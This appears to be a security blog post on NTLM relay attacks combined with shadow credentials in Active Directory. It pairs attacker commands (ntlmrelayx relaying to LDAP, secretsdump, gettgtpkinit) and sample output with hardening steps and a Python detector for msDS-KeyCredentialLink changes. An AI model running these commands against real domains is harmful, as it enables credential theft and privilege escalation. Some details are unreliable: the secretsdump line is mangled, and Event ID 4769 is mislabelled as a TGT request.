Indicator of Compromise: NTLM Relay Attack with Shadow Credentials

NTLM relay attacks combined with shadow credentials pose a significant threat to enterprise networks. Attackers exploit weak NTLM authentication to relay credentials and gain unauthorized access. This technique allows them to impersonate users, escalate privileges, and move laterally across systems.

You Should Know:

### **1. Understanding NTLM Relay Attacks**

NTLM relay attacks occur when an attacker intercepts NTLM authentication requests and forwards them to another system to gain access. Tools like Responder and Impacket’s ntlmrelayx automate this process.

Example Command (Attacker Side):

python3 ntlmrelayx.py -t ldap://dc.example.com -smb2support --shadow-credentials --add-computer

### **2. Exploiting Shadow Credentials**

Shadow credentials involve modifying a user or computer object’s `msDS-KeyCredentialLink` attribute to allow certificate-based authentication.

**Step-by-Step Exploitation:**

1. **Dump NTLM Hashes** (If already compromised):

secretsdump.py DOMAIN/user:[email protected]

2. **Relay NTLM to LDAP & Add Shadow Credentials:**

python3 ntlmrelayx.py -t ldaps://dc.example.com --shadow-credentials --add-computer

3. **Request a Kerberos Ticket Using the New Certificate:**

gettgtpkinit.py -cert-pem cert.pem -key-pem key.pem domain/user user.ccache

### **3. Defensive Measures**

  • Disable NTLM where possible (Use Kerberos).
  • Enable SMB Signing to prevent relay attacks:
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    
  • Monitor LDAP Changes for unexpected `msDS-KeyCredentialLink` modifications.

### **4. Detection Techniques**

  • SIEM Rules: Look for Event ID 4769 (Kerberos TGT requests with certificate authentication).
  • AD Monitoring: Track changes to `msDS-KeyCredentialLink` via PowerShell:
    Get-ADObject -Filter * -Properties msDS-KeyCredentialLink | Where-Object { $_.'msDS-KeyCredentialLink' }
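As an added example (not from the original post), the following Python flags `msDS-KeyCredentialLink` writes in Directory Service Changes events (Event ID 5136, which only appears when object-level auditing is enabled on the target objects). Field names follow the Windows event; the records, account names and the allow-list of legitimate provisioning accounts are constructed assumptions for this illustration.

```python
import re

ATTR = "msDS-KeyCredentialLink"
# 5136 OperationType as it appears in the event XML (assumption from the
# Windows event schema: %%14674 = Value Added, %%14675 = Value Deleted).
VALUE_ADDED = {"%%14674", "Value Added"}

# Constructed 5136 records: field names mirror the Security event,
# accounts, DNs and domain are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "svc-whfb",
     "ObjectDN": "CN=alice,OU=Users,DC=example,DC=com",
     "AttributeLDAPDisplayName": ATTR, "OperationType": "%%14674"},
    # A machine account adding a key credential to its own object (self-write)
    {"EventID": 5136, "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,OU=Workstations,DC=example,DC=com",
     "AttributeLDAPDisplayName": ATTR, "OperationType": "%%14674"},
    # An ordinary user adding a key credential to another object
    {"EventID": 5136, "SubjectUserName": "bob",
     "ObjectDN": "CN=Victim,DC=example,DC=com",
     "AttributeLDAPDisplayName": ATTR, "OperationType": "%%14674"},
    # Unrelated attribute change: must not be flagged
    {"EventID": 5136, "SubjectUserName": "bob",
     "ObjectDN": "CN=bob,OU=Users,DC=example,DC=com",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
]

def object_cn(dn):
    """Leading CN of a distinguished name, lower-cased ('' if absent)."""
    m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1).lower() if m else ""

def find_shadow_credential_writes(events, allowed_writers):
    """Return (subject, object DN, reason) for each suspicious key-credential add."""
    allowed = {a.lower() for a in allowed_writers}
    findings = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("AttributeLDAPDisplayName") != ATTR:
            continue
        if ev.get("OperationType") not in VALUE_ADDED:
            continue  # value removals are cleanup, not persistence
        subject = ev["SubjectUserName"].lower()
        if subject in allowed:
            continue  # known provisioning account (e.g. Windows Hello for Business)
        # Relayed-to-LDAP accounts typically write the key credential onto
        # themselves; a principal writing to its own object is the strongest signal.
        reason = "self-write" if subject.rstrip("$") == object_cn(ev["ObjectDN"]) \
            else "unexpected writer"
        findings.append((ev["SubjectUserName"], ev["ObjectDN"], reason))
    return findings

if __name__ == "__main__":
    for finding in find_shadow_credential_writes(SAMPLE_EVENTS, {"svc-whfb"}):
        print(finding)
```

The CN-versus-sAMAccountName comparison is a heuristic; a production rule should resolve the object DN to its account name before deciding "self-write".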
    

### **5. Mitigation via GPO**

  • Restrict NTLM Relay Attack Paths:
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" -Name "LdapServerIntegrity" -Value 2
    

**What Undercode Say:**

NTLM relay attacks remain a critical threat due to legacy authentication dependencies. Organizations must enforce SMB signing, disable NTLM, and monitor certificate-based authentication anomalies. Attackers leverage shadow credentials for persistence, making LDAP hardening essential.

**Expected Output:**

[+] Successfully relayed NTLM to LDAP 
[+] Shadow credential added to: CN=Victim,DC=example,DC=com 
[+] Certificate saved to: cert.pem 

Reference: dsinternals.com

Reported By: Florian Hansemann – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
